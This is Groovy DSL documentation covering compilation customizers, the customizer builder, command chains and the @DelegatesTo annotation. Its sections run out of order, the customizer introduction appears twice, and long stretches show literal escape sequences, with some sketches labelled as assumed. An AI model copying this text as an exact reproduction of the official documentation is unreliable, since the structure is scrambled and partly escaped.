import org.codehaus.groovy.control.customizers.ASTTransformationCustomizer
import groovy.util.logging.Log

include::{projectdir}/src/spec/test/CustomizersTest.groovy[tags=ast_cz_simple,indent=0]
--------------------------------------------------------------------------

That's all! Internally, the `@Log` AST transformation is applied to
every class node in the compilation unit. This means that it will be
applied to the script, but also to classes defined within the script.

If the AST transformation that you are using accepts parameters, you can
use parameters in the constructor too:

[source,groovy]
-----------------------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CustomizersTest.groovy[tags=ast_cz_customname,indent=0]
-----------------------------------------------------------------------------------------------------------------

As the AST transformation customizer works with objects instead of AST
nodes, not all values can be converted to AST transformation parameters.
For example, simple values are converted to `ConstantExpression` (that
is, `LOGGER` is converted to `new ConstantExpression('LOGGER')`), but if
your AST transformation takes a closure as an argument, then you have to
give it a `ClosureExpression`, like in the following example:

[source,groovy]
--------------------------------------------------------------------------------------------------------------
include::{projectdir}/src/spec/test/CustomizersTest.groovy[tags=ast_cz_closure,indent=0]
--------------------------------------------------------------------------------------------------------------

For a complete list of options, please refer to gapi::org.codehaus.groovy.control.customizers.ASTTransformationCustomizer
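
Putting it together, a minimal sketch of a shell that applies `@Log` transparently could
look like this:

[source,groovy]
----
import org.codehaus.groovy.control.CompilerConfiguration
import org.codehaus.groovy.control.customizers.ASTTransformationCustomizer
import groovy.util.logging.Log

def config = new CompilerConfiguration()
config.addCompilationCustomizers(new ASTTransformationCustomizer(Log))

// the implicit script class gets a `log` field, as if it were annotated with @Log
new GroovyShell(config).evaluate "log.info 'transform applied transparently'"
----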

=== Secure AST customizer

This customizer will allow the developer of a DSL to restrict the
*grammar* of the language, to prevent users from using some constructs,
for example. It is ``secure'' only in that sense and it is very
important to understand that it does *not* replace a security manager.
The only reason for it to exist is to limit the expressiveness of the
language. This customizer only works at the AST (abstract syntax tree)
level, not at runtime! It can seem strange at first glance, but it makes
much more sense if you think of Groovy as a platform to build DSLs. You
may not want a user to have a complete language at hand. In the example
below, we will demonstrate it using an example of a language that only
allows arithmetic operations, but this customizer allows you to:

* allow/disallow creation of closures
* allow/disallow imports
* allow/disallow package definition
* allow/disallow definition of methods
* restrict the receivers of method calls
* restrict the kind of AST expressions a user can use
* restrict the tokens (grammar-wise) a user can use
* restrict the types of the constants that can be used in code

For all those features, the secure AST customizer works using either a
whitelist (list of elements that are allowed) *or* a blacklist (list of
elements that are disallowed). For each type of feature (imports,
tokens, …) you have the choice to use either a whitelist or a blacklist,
but you can mix whitelists and blacklists for distinct features. In
general, you will choose whitelists (disallow all, allow selected).

[source,groovy]
-------------------------------------------------------------------------------------
import org.codehaus.groovy.control.customizers.SecureASTCustomizer
import static org.codehaus.groovy.syntax.Types.* <1>

include::{projectdir}/src/spec/test/CustomizersTest.groovy[tags=secure_cz,indent=0]
-------------------------------------------------------------------------------------
<1> use for token types from gapi::org.codehaus.groovy.syntax.Types
<2> you can use class literals here

If what the secure AST customizer provides out of the box isn't enough
for your needs, before creating your own compilation customizer, you
might be interested in the expression and statement checkers that the
AST customizer supports. Basically, it allows you to add custom checks
on the AST tree, on expressions (expression checkers) or statements
(statement checkers). For this, you must
implement `org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker`
or `org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker`.

Those interfaces define a single method called `isAuthorized`, returning
a boolean, and taking a `Statement` (or `Expression`) as a parameter. This
allows you to perform complex logic over expressions or statements to
tell if a user is allowed to do it or not.

For example, there's no predefined configuration flag in the customizer which
will let you prevent people from using an attribute expression. Using a custom
checker, it is trivial:

[source,groovy]
----------------------------------------------------------------------
include::{projectdir}/src/spec/test/CustomizersTest.groovy[tags=secure_cz_custom,indent=0]
----------------------------------------------------------------------

Then we can make sure that this works by evaluating a simple script:

[source,groovy]
----
new GroovyShell(config).evaluate '''
include::{projectdir}/src/spec/test/CustomizersTest.groovy[tags=secure_cz_custom_assert,indent=4]
'''
----
<1> will fail compilation

Statements can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker
Expressions can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker

=== Source aware customizer

This customizer may be used as a filter on other customizers. The
filter, in that case, is the `org.codehaus.groovy.control.SourceUnit`.
For this, the source aware customizer takes another customizer as a
delegate, and it will apply the customization of that delegate if and only
if predicates on the source unit match.

`SourceUnit` gives you access to multiple things but in particular the
file being compiled (if compiling from a file, of course). It gives
you the potential to perform operations based on the file name, for
example. 
Here is how you would create a source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.SourceAwareCustomizer\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz,indent=0]\n--------------------------------------------------------------------\n\nThen you can use predicates on the source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz_predicates,indent=0]\n--------------------------------------------------------------------------\n\n=== Customizer builder\n\nIf you are using compilation customizers in Groovy code (like the\nexamples above) then you can use an alternative syntax to customize compilation.\nA builder\u00a0(`org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder`)\nsimplifies the creation of customizers using a hierarchical DSL.\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\nimport static org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder.withConfig <1>\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=customizer_withconfig,indent=0]\n-----------------------------------------------------------------------------------------------------\n<1> static import of the builder method\n<2> configuration goes here\n\nThe code sample above shows how to use the builder. A static\nmethod,\u00a0_withConfig_, takes a closure corresponding to the builder code,\nand automatically registers compilation customizers to the\nconfiguration. 
Every compilation customizer available in the distribution
can be configured this way:

==== Import customizer

[source,groovy]
----------------------------------------------------------------------------------
withConfig(configuration) {
    imports { // imports customizer
        normal 'my.package.MyClass' // a normal import
        alias 'AI', 'java.util.concurrent.atomic.AtomicInteger' // an aliased import
        star 'java.util.concurrent' // star imports
        staticMember 'java.lang.Math', 'PI' // static import
        staticMember 'pi', 'java.lang.Math', 'PI' // aliased static import
    }
}
----------------------------------------------------------------------------------

==== AST transformation customizer

[source,groovy]
-------------------------------------------
withConfig(conf) {
    ast(Log) <1>
}

withConfig(conf) {
    ast(Log, value: 'LOGGER') <2>
}
-------------------------------------------
<1> apply @Log transparently
<2> apply @Log with a different name for the logger

==== Secure AST customizer

[source,groovy]
--------------------------------------
withConfig(conf) {
    secureAst {
        closuresAllowed = false
        methodDefinitionAllowed = false
    }
}
--------------------------------------

==== Source aware customizer

[source,groovy]
--------------------------------------------------------------------------------------
withConfig(configuration) {
    source(extension: 'sgroovy') {
        ast(CompileStatic) <1>
    }
}

withConfig(configuration) {
    source(extensions: ['sgroovy', 'sg']) {
        ast(CompileStatic) <2>
    }
}

withConfig(configuration) {
    source(extensionValidator: { it.name in ['sgroovy', 'sg'] }) {
        ast(CompileStatic) <2>
    }
}

withConfig(configuration) {
    source(basename: 'foo') {
        ast(CompileStatic) <3>
    }
}

withConfig(configuration) {
    source(basenames: ['foo', 'bar']) {
        ast(CompileStatic) <4>
    }
}

withConfig(configuration) {
    source(basenameValidator: { it in ['foo', 'bar'] }) {
        ast(CompileStatic) <4>
    }
}

withConfig(configuration) {
    source(unitValidator: { unit -> !unit.AST.classes.any { it.name == 'Baz' } }) {
        ast(CompileStatic) <5>
    }
}
--------------------------------------------------------------------------------------
<1> apply CompileStatic AST annotation on .sgroovy files
<2> apply CompileStatic AST annotation on .sgroovy or .sg files
<3> apply CompileStatic AST annotation on files whose name is 'foo'
<4> apply CompileStatic AST annotation on files whose name is 'foo' or 'bar'
<5> apply CompileStatic AST annotation on files that do not contain a class named 'Baz'

==== Inlining a customizer

Inlining a customizer allows you to write a compilation customizer
directly, without having to create a class for it.

[source,groovy]
--------------------------------------------------------------
withConfig(configuration) {
    inline(phase: 'CONVERSION') { source, context, classNode -> <1>
        println "visiting $classNode" <2>
    }
}
--------------------------------------------------------------
<1> define an inlined customizer which will execute at the CONVERSION phase
<2> prints the name of the class node being compiled

==== Multiple customizers

Of course, the builder allows you to define multiple customizers at
once:

[source,groovy]
---------------------------
withConfig(configuration) {
    ast(ToString)
    ast(EqualsAndHashCode)
}
---------------------------

=== Config script flag

So far, we have described how you can customize compilation using
a `CompilerConfiguration` 
class, but this is only possible if you
embed Groovy and create your own instances
of `CompilerConfiguration` (then use them to create a
`GroovyShell`, `GroovyScriptEngine`, …).

If you want it to be applied on the classes you compile with the normal
Groovy compiler (that is to say with `groovyc`, `ant` or `gradle`,
for example), it is possible to use a compilation flag named `configscript`
that takes a Groovy configuration script as argument.

This script gives you access to the `CompilerConfiguration` instance *before*
the files are compiled (exposed into the configuration script as a variable named `configuration`),
so that you can tweak it.

It also transparently integrates the compiler configuration builder above. As an example, let's see
how you would activate static compilation by default on all classes.

==== Static compilation by default

Normally, classes in Groovy are compiled with a dynamic runtime. You can activate static compilation
by placing an annotation named `@CompileStatic` on any class. Some people would like to have this
mode activated by default, that is to say not having to annotate classes. Using `configscript`,
this is possible. First of all, you need to create a file named `config.groovy` in `src/conf` with
the following contents:

[source,groovy]
--------------------------------------
withConfig(configuration) { <1>
    ast(groovy.transform.CompileStatic)
}
--------------------------------------
<1> _configuration_ references a `CompilerConfiguration` instance

That is actually all you need. You don't have to import the builder, it's automatically
exposed in the script. Then, compile your files using the following command line:

---------------------------------------------------------------------------
groovyc -configscript src/conf/config.groovy src/main/groovy/MyClass.groovy
---------------------------------------------------------------------------

We strongly recommend that you separate configuration files from classes,
which is why we suggest using the `src/main` and `src/conf` directories above.

=== AST transformations (TBD)
== Custom type checking extensions (TBD)
== Builders (TBD)
=== Creating a builder (TBD)
==== BuilderSupport (TBD)
==== FactoryBuilderSupport (TBD)
=== Existing builders (TBD)
==== MarkupBuilder (TBD) - assigned to JNorthr 1July14
==== StreamingMarkupBuilder (TBD)
==== SaxBuilder (TBD)
==== StaxBuilder (TBD)
==== DomBuilder (TBD)
==== NodeBuilder (TBD)
==== JsonBuilder (TBD)
==== StreamingJsonBuilder (TBD)
==== SwingBuilder (TBD)
==== AntBuilder (TBD)
==== CliBuilder (TBD)
==== ObjectGraphBuilder (TBD)
Let\u2019s have a look at some examples\nsupported by this new syntax:\n\n[source,groovy]\n---------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_1,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_2,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_3,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_4,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_5,indent=0]\n---------------------------------------------------------------------------------------------------------------\n\nIt is also possible to use methods in the chain which take no arguments,\nbut in that case, the parentheses are needed:\n\n[source,groovy]\n-------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_6,indent=0]\n-------------------------------------------------------------------------------------------------\n\nIf your command chain contains an odd number of elements, the chain will\nbe composed of method \/ arguments, and will finish with a final property\naccess:\n\n[source,groovy]\n-------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_7,indent=0]\n-------------------------------------------------------------------------------------\n\nThis command chain approach opens up interesting possibilities in terms of the much wider range of DSLs which\ncan now be written in Groovy.\n\nThe above examples illustrate using a command chain based DSL but not how to create one. There are various strategies\nthat you can use, but to illustrate creating such a DSL, we will show a couple of examples - first using maps and Closures:\n\n[source,groovy]\n------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl1,indent=0]\n------------------------------------------------------------------------------------------------------\n\nAs a second example, consider how you might write a DSL for simplifying\none of your existing APIs. Maybe you need to put this code in front of\ncustomers, business analysts or testers who might not be hard-core Java\ndevelopers. We\u2019ll use the `Splitter` from the Google\nhttp:\/\/code.google.com\/p\/guava-libraries\/[Guava libraries] project as it\nalready has a nice Fluent API. Here is how we might use it out of the\nbox:\n\n[source,groovy]\n----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]\n----------------------------------------------------------------------------------------------------------------\n\nIt reads fairly well for a Java developer but if that is not your target\naudience or you have many such statements to write, it could be\nconsidered a little verbose. Again, there are many options for writing a\nDSL. 
We\u2019ll keep it simple with Maps and Closures. We\u2019ll first write a\nhelper method:\n\n[source,groovy]\n------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl3,indent=0]\n------------------------------------------------------------------------------------------------------\n\nNow, instead of this line from our original example:\n\n[source,groovy]\n----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl2_assert,indent=0]\n----------------------------------------------------------------------------------------------------------------\n\nwe can write this:\n\n[source,groovy]\n-----------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CommandChainsTest.groovy[tags=commandchain_impl3_assert,indent=0]\n-----------------------------------------------------\n\n\n== Operator overloading (TBD)\n== Script base classes (TBD)\n== Adding properties to numbers (TBD)\n[[section-delegatesto]]\n== @DelegatesTo\n\n[[TheDelegatesToannotation-DSLsmadeeasy]]\n=== Explaining delegation strategy at compile time\n\n`@groovy.lang.DelegatesTo` is a documentation and compile-time annotation aimed at:\n\n * documenting APIs that use closures as arguments\n * providing type information for the static type checker and compiler\n\nThe Groovy language is a platform of choice for building DSLs. Using\nclosures, it\u2019s quite easy to create custom control structures, and it is\njust as simple to create builders. Imagine that you have the following\ncode:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]\n---------------------------------------\n\nOne way of implementing this is using the builder strategy, which\nimplies a method named `email`\u00a0which accepts a closure as an argument.\nThe method may delegate subsequent calls to an object that implements\nthe\u00a0`from`,\u00a0`to`,\u00a0`subject` and\u00a0`body` methods. Again,\u00a0`body` is a\nmethod which accepts a closure as an argument and uses the builder\nstrategy.\n\nImplementing such a builder is usually done the following way:\n\n[source,groovy]\n----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_no_delegatesto,indent=0]\n----------------------------------------------\n\nThe `EmailSpec` class implements the\u00a0`from`,\u00a0`to`, \u2026 methods. By\ncalling\u00a0`rehydrate`, we\u2019re creating a copy of the closure for which we\nset the\u00a0`delegate`,\u00a0`owner` and\u00a0`thisObject` values. Setting the owner\nand the `this` object is not very important here since we will use the\n`DELEGATE_ONLY` strategy which says that the method calls will be\nresolved only against the delegate of the closure.\n\n[source,groovy]\n----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=emailspec_no_delegatesto,indent=0]\n----------------------------------------------\n\nThe `EmailSpec` class itself has a `body` method accepting a closure that is cloned and executed. 
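\n\nSince the snippets above are pulled in from the test sources via include directives, here is a minimal, self-contained sketch of what such a builder could look like (the class bodies below are assumptions for illustration, not the actual spec sources):\n\n[source,groovy]\n----------------------------------------------\nclass EmailSpec {\n void from(String address) { println \"from: $address\" }\n void to(String... addresses) { println \"to: $addresses\" }\n void subject(String subject) { println \"subject: $subject\" }\n void body(Closure cl) { \/\/ same builder strategy, one level deeper\n def code = cl.rehydrate(new BodySpec(), this, this)\n code.resolveStrategy = Closure.DELEGATE_ONLY\n code()\n }\n}\n\nclass BodySpec {\n void p(String line) { println \"body: $line\" }\n}\n\ndef email(Closure cl) { \/\/ the builder entry point described above\n def code = cl.rehydrate(new EmailSpec(), this, this)\n code.resolveStrategy = Closure.DELEGATE_ONLY\n code()\n}\n----------------------------------------------\n\n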
This is what\nwe call the builder pattern in Groovy.\n\nOne of the problems with the code that we\u2019ve shown is that the user of\nthe `email` method doesn\u2019t have any information about the methods that\nhe\u2019s allowed to call inside the closure. The only possible information\nis from the method documentation. There are two issues with this: first\nof all, documentation is not always written, and if it is, it\u2019s not\nalways available (javadoc not downloaded, for example). Second, it\ndoesn\u2019t help IDEs. What would be really interesting here is for IDEs\nto help the developer by suggesting, once they are in the closure body,\nmethods that exist on the `EmailSpec` class.\n\nMoreover, if the user calls a method in the closure which is not defined\nby the\u00a0`EmailSpec` class, the IDE should at least issue a warning (because\nit\u2019s very likely that it will break at runtime).\n\nOne more problem with the code above is that it is not compatible with static type checking. Type checking would let\nthe user know if a method call is authorized at compile time instead of runtime, but if you try to perform type\nchecking on this code:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_builder_usage,indent=0]\n---------------------------------------\n\nThen the type checker will know that there\u2019s an\u00a0`email` method accepting\na\u00a0`Closure`, but it will complain for every method call\u00a0*inside* the\nclosure, because\u00a0`from`, for example, is not a method which is defined\nin the class. Indeed, it\u2019s defined in the\u00a0`EmailSpec` class and it has\nabsolutely no hint to help it know that the closure delegate will, at\nruntime, be of type\u00a0`EmailSpec`:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_nodelegatesto,indent=0]\n---------------------------------------\n\nwill fail compilation with errors like this one:\n\n----\n[Static type checking] - Cannot find matching method MyScript#from(java.lang.String). Please check if the declared type is right and if the method exists.\n @ line 31, column 21.\n from 'dsl-guru@mycompany.com'\n----\n\n[[TheDelegatesToannotation-DelegatesTo]]\n=== @DelegatesTo\n\nFor those reasons, Groovy 2.1 introduced a new annotation\nnamed\u00a0`@DelegatesTo`. The goal of this annotation is to solve both the\ndocumentation issue, by letting your IDE know about the expected\nmethods in the closure body, and the type checking\nissue, by giving hints to the compiler about the potential\nreceivers of method calls in the closure body.\n\nThe idea is to annotate the\u00a0`Closure` parameter of the\u00a0`email` method:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_delegatesto,indent=0]\n---------------------------------------\n\nWhat we\u2019ve done here is tell the compiler (or the IDE) that when the\nmethod is called with a closure, the delegate of this closure will\nbe set to an object of type\u00a0`EmailSpec`. 
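\n\nAs the include above is not rendered here, a hypothetical sketch of the annotated signature (reusing the `EmailSpec` sketch from above):\n\n[source,groovy]\n---------------------------------------\ndef email(@DelegatesTo(EmailSpec) Closure cl) {\n def code = cl.rehydrate(new EmailSpec(), this, this)\n code.resolveStrategy = Closure.DELEGATE_ONLY\n code()\n}\n---------------------------------------\n\n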
But there is still a problem: the\ndefault delegation strategy is not the one which is used in our method.\nSo we will give more information and tell the compiler (or the IDE) that\nthe delegation strategy is also changed:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_delegatesto_strategy,indent=0]\n---------------------------------------\n\nNow, both the IDE and the type checker (if you are using `@TypeChecked`)\nwill be aware of the delegate and the delegation strategy. This is very\nnice because it allows the IDE to provide smart completion, and\nit also removes errors at compile time that exist only because the\nbehaviour of the program is normally only known at runtime!\n\nThe following code will now pass compilation:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_pass,indent=0]\n---------------------------------------\n\n[[TheDelegatesToannotation-DelegatesTomodes]]\n=== DelegatesTo modes\n\n`@DelegatesTo` supports multiple modes that we will describe with examples\nin this section.\n\n[[TheDelegatesToannotation-Simpledelegation]]\n==== Simple delegation\n\nIn this mode, the only mandatory parameter is the\u00a0_value_ which says to\nwhich class we delegate calls. Nothing more. We\u2019re telling the compiler\nthat the type of the delegate will\u00a0*always* be of the type documented\nby\u00a0`@DelegatesTo` (note that it can be a subclass, but if it is, the\nmethods defined by the subclass will not be visible to the type\nchecker).\n\n[source,groovy]\n-----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=simple_delegation,indent=0]\n-----------------------------------------------\n\n[[TheDelegatesToannotation-Delegationstrategy]]\n==== Delegation strategy\n\nIn this mode, you must specify both the delegate class\u00a0*and* a\ndelegation strategy. This must be used if the closure will not be called\nwith the default delegation strategy, which is\u00a0`Closure.OWNER_FIRST`.\n\n[source,groovy]\n----------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegation_with_strategy,indent=0]\n----------------------------------------------------------------------------------\n\n[[TheDelegatesToannotation-Delegatetoparameter]]\n==== Delegate to parameter\n\nIn this variant, we will tell the compiler that we are delegating to\nanother parameter of the method. Take the following code:\n\n[source,groovy]\n-------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_method_no_delegatesto,indent=0]\n-------------------------------------------------\n\nHere, the delegate which will be used is\u00a0*not* created inside the\u00a0`exec`\nmethod. In fact, we take an argument of the method and delegate to it.\nUsage may look like this:\n\n[source,groovy]\n-----------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_usage,indent=0]\n-----------------------\n\nEach of the method calls is delegated to the\u00a0`email` parameter. 
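\n\nA hypothetical sketch of such an `exec` method and its usage (the names mirror the includes above but are assumptions):\n\n[source,groovy]\n-----------------------\ndef exec(Object target, Closure code) {\n def copy = code.rehydrate(target, this, this) \/\/ the delegate is the target passed in, not created here\n copy.resolveStrategy = Closure.DELEGATE_FIRST\n copy()\n}\n\ndef email = new EmailSpec() \/\/ the EmailSpec sketch from above\nexec(email) {\n from 'dsl-guru@mycompany.com'\n to 'john.doe@yourcompany.com'\n subject 'hello'\n}\n-----------------------\n\n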
This is\na widely used pattern which is also supported by\u00a0`@DelegatesTo` using a\ncompanion annotation:\n\n[source,groovy]\n---------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_method_with_delegatesto,indent=0]\n---------------------------------------------------------------\n\nA closure is annotated with\u00a0`@DelegatesTo`, but this time, without\nspecifying any class. Instead, we\u2019re annotating another parameter\nwith\u00a0`@DelegatesTo.Target`. The type of the delegate is then determined\nat compile time. One could think that we are using the parameter type,\nwhich in this case is\u00a0`Object`, but this is not true. Take this code:\n\n[source,groovy]\n--------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_header,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_footer,indent=0]\n--------------------------------------\n\nRemember that this works out of the box\u00a0*without* having to annotate\nwith\u00a0`@DelegatesTo`. However, to make the IDE aware of the delegate\ntype, or the\u00a0*type checker* aware of it, we need to add\u00a0`@DelegatesTo`.\nAnd in this case, it will know that the\u00a0`Greeter` variable is of\ntype\u00a0`Greeter`, so it will not report errors on the\u00a0_sayHello_\nmethod\u00a0*even if the exec method doesn\u2019t explicitly define the target as\nof type Greeter*. This is a very powerful feature, because it prevents\nyou from writing multiple versions of the same\u00a0`exec` method for\ndifferent receiver types!\n\nIn this mode, the\u00a0`@DelegatesTo` annotation also supports the\u00a0`strategy`\nparameter that we\u2019ve described above.\n\n[[TheDelegatesToannotation-Multipleclosures]]\n==== Multiple closures\n\nIn the previous example, the\u00a0`exec` method accepted only one closure,\nbut you may have methods that take multiple closures:\n\n[source,groovy]\n--------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_no_delegatesto,indent=0]\n--------------------------------------------------------------------\n\nThen nothing prevents you from annotating each closure\nwith\u00a0`@DelegatesTo`:\n\n[source,groovy]\n--------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_classes,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_header,indent=0]\n ...\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_footer,indent=0]\n--------------------------------------------------------------------\n\nBut more importantly, if you have multiple closures\u00a0*and* multiple\narguments, you can use several targets:\n\n[source,groovy]\n-----------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_multitarget,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=multitarget_test,indent=0]\n-----------------------------------------------------------------------------\n\nNOTE: At this point, you may wonder why we don\u2019t use the parameter names as\nreferences. 
The reason is that the information (the parameter name) is\nnot always available (it\u2019s debug-only information), so it\u2019s a\nlimitation of the JVM.\n\n==== Delegating to a generic type\n\nIn some situations, it is interesting to instruct the IDE or the compiler that the delegate type will not be a parameter\nbut a generic type. Imagine a configurator that runs on a list of elements:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_method,indent=0]\n----\n\nThen this method can be called with any list like this:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_usage,indent=0]\n----\n\nTo let the type checker and the IDE know that the `configure` method calls the closure on each element of the list, you\nneed to use `@DelegatesTo` differently:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_with_delegatesto,indent=0]\n----\n\n`@DelegatesTo` takes an optional `genericTypeIndex` argument that tells the index of the generic type that will\nbe used as the delegate type. This *must* be used in conjunction with `@DelegatesTo.Target` and the index starts at 0. In\nthe example above, that means that the delegate type is resolved against `List<T>`, and since the generic type at index\n0 is `T` and inferred as a `Realm`, the type checker infers that the delegate type will be of type `Realm`.\n\nNOTE: We're using a `genericTypeIndex` instead of a placeholder (`T`) because of JVM limitations.\n\n[[compilation-customizers]]\n== Compilation customizers\n=== Introduction\n\nWhether you are using\u00a0`groovyc` to compile classes or a\u00a0`GroovyShell`,\nfor example, to execute scripts, under the hood, a _compiler configuration_ is used. This configuration holds information\nlike the source encoding or the classpath, but it can also be used to perform further operations, such as adding imports by\ndefault, applying AST transformations transparently or disabling global AST transformations.\n\nThe goal of compilation customizers is to make those common tasks easy to implement. For that, the\u00a0`CompilerConfiguration`\nclass is the entry point. The general schema will always be based on the following code:\n\n[source,groovy]\n--------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\n\/\/ create a configuration\ndef config = new CompilerConfiguration()\n\/\/ tweak the configuration\nconfig.addCompilationCustomizers(...)\n\/\/ run your script\ndef shell = new GroovyShell(config)\nshell.evaluate(script)\n--------------------------------------------------------\n\nCompilation customizers must extend the\u00a0_org.codehaus.groovy.control.customizers.CompilationCustomizer_ class. A customizer works:\n\n* on a specific compilation phase\n* on\u00a0_every_ class node being compiled\n\nYou can implement your own compilation customizer but Groovy includes some of the most common operations.\n\n=== Import customizer\n\nUsing this compilation customizer, your code will have imports added\ntransparently. This is particularly useful for scripts implementing a\nDSL where you want to save users from having to write imports. 
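\n\nA minimal, self-contained sketch of wiring an `ImportCustomizer` into a `GroovyShell` (the star import chosen here is just an assumption for the example):\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ndef config = new CompilerConfiguration()\ndef imports = new ImportCustomizer()\nimports.addStarImports('java.util.concurrent') \/\/ scripts can now use e.g. ConcurrentHashMap unqualified\nconfig.addCompilationCustomizers(imports)\n\nnew GroovyShell(config).evaluate('new ConcurrentHashMap()')\n-----------------------------------------------------------------------------------------------------\n\n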
The\nimport customizer will let you add all the variants of imports the\nGroovy language allows, that is:\n\n* class imports, optionally aliased\n* star imports\n* static imports, optionally aliased\n* static star imports\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=import_cz,indent=0]\n-----------------------------------------------------------------------------------------------------\n\nA detailed description of all shortcuts can be found in gapi::org.codehaus.groovy.control.customizers.ImportCustomizer\n\n=== AST transformation customizer\n\nThe AST transformation customizer is meant to apply AST transformations\ntransparently. Unlike global AST transformations that apply on every\nclass being compiled as long as the transform is found on the classpath\n(which has drawbacks like increasing the compilation time or side\neffects due to transformations applied where they should not be), the\ncustomizer will allow you to selectively apply a transform only for\nspecific scripts or classes.\n\nAs an example, let\u2019s say you want to be able to use\u00a0`@Log` in a script.\nThe problem is that\u00a0`@Log` is normally applied on a class node and a\nscript, by definition, doesn\u2019t require one. But implementation-wise,\nscripts are classes; it\u2019s just that you cannot annotate this implicit\nclass node with\u00a0`@Log`. Using the AST customizer, you have a workaround\nto do it:\n\n[source,groovy]\n--------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.ASTTransformationCustomizer\nimport groovy.util.logging.Log\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_simple,indent=0]\n--------------------------------------------------------------------------\n\nThat\u2019s all! Internally, the\u00a0`@Log` AST transformation is applied to\nevery class node in the compilation unit. 
